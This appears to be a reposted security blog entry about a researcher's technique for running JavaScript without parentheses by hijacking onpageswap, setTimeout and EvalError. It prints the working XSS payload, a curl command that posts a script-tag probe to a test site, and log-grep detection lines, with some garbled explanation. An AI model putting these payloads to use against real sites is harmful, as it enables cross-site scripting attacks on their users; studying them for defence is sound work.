Abuse EvalError, onpageswap, and setTimeout for JS Execution Without Parens

By /

Listen to this Post

Featured Image
Gareth Heyes, a researcher at PortSwigger Web Security, demonstrates a novel technique to achieve JavaScript execution without parentheses by abusing EvalError, onpageswap, and setTimeout. This method redirects the page to trigger onpageswap, hijacks the thrown error, and converts it into executable code.

Exploit Code:


<script> 
onpageswap = setTimeout; 
location = 'x'; 
Event.prototype.toString = EvalError.prototype.toString; 
Event.prototype.name = 'alert\x281\x29'; 
</script>

You Should Know:

How This Exploit Works

1. `onpageswap` Hijacking:

  • The `onpageswap` event is reassigned to setTimeout, allowing code execution when the page is redirected.
    – `location = ‘x’` forces a navigation, triggering the event.

2. Error Manipulation:

– `Event.prototype.toString` is overridden with EvalError.prototype.toString.
– `Event.prototype.name` is set to 'alert(1)', converting the error into executable JS.

3. Execution Without Parentheses:

  • The technique bypasses restrictions where parentheses are blocked (e.g., alert1“).

Practical Testing

Test this in a controlled environment (e.g., PortSwigger’s Web Security Academy lab):

// Verify if the prototype override works 
console.log(Event.prototype.toString.call({ name: 'test' }));

Defensive Measures

  • Content Security Policy (CSP):
    Content-Security-Policy: script-src 'self';
  • Sanitization:
    Use DOMPurify or similar libraries to filter malicious scripts.

Related Linux/Windows Commands for Security Testing

  • Check for XSS Vulnerabilities with curl:
    curl -X POST "http://test.site/search" -d "query=<script>alert(1)</script>"
  • Monitor Network Traffic (Linux):
    tcpdump -i eth0 port 80 -A | grep "script"
  • Windows PowerShell for Log Analysis:
    Get-Content .\access.log | Select-String "<script>"

What Undercode Say

This technique highlights the evolving nature of XSS attacks, where even obscure JavaScript behaviors can be weaponized. Security professionals must stay updated with bypass techniques and enforce strict input validation.

Expected Output:

  • Successful execution of `alert(1)` without parentheses.
  • Detection of prototype pollution in security logs.

Prediction

Future XSS attacks may increasingly leverage lesser-known JS features, requiring advanced sanitization and runtime protection mechanisms.

Reference:

PortSwigger XSS Cheat Sheet

IT/Security Reporter URL:

Reported By: Gareth Heyes – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: